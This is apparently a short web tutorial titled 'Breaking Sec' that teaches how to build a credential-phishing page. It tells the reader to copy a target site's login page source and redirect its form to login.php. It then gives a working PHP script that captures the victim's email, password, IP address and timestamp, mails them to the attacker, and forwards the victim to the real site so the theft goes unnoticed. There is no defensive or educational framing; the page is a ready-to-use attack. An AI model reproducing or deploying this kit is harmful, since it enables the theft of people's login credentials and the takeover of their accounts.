Breaking Sec

Phishing

First we go to the website that we want to make the phishing page for.
If you are already logged in at the site log out first and then continue.

Now we are going to get the source of the website. Right click and select view page source or simply press ctrl+u.
Now you will see the page source. Search in the code for something like this: loginform
And we are in a piece of code like this:
<form name="loginForm" method="post" action="/friend/login.do">

To make our phishing page we must copy and paste the whole code in notepad and save it as "index.php"
After this go to the line: <form name="loginForm" method="post" action="/friend/login.do">
and change it from: action="/friend/login.do" to: action="login.php"

As you understand we need a file login.php. Open another notepad and paste this code in it:

<?PHP
$email = $_POST['email'];
$pass = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$date = date("d-m-y / H:i:s");
$message = "Email: $email\r\nPassword: $pass\r\nDate-Time: $date\r\nIp: $ip\r\n\r\n";
$message = wordwrap($message, 70);
mail('Your Email@mail.com', "Pass " . $email, $message);
Header("Location: http://www.The website you want to make the phishing page for.com/");
?>

Change the last 2 lines and then save it as login.php.